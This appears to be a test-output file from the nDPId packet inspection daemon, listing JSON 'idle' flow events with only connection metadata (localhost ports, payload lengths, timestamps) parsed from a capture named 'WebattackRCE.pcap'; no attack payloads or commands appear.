-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 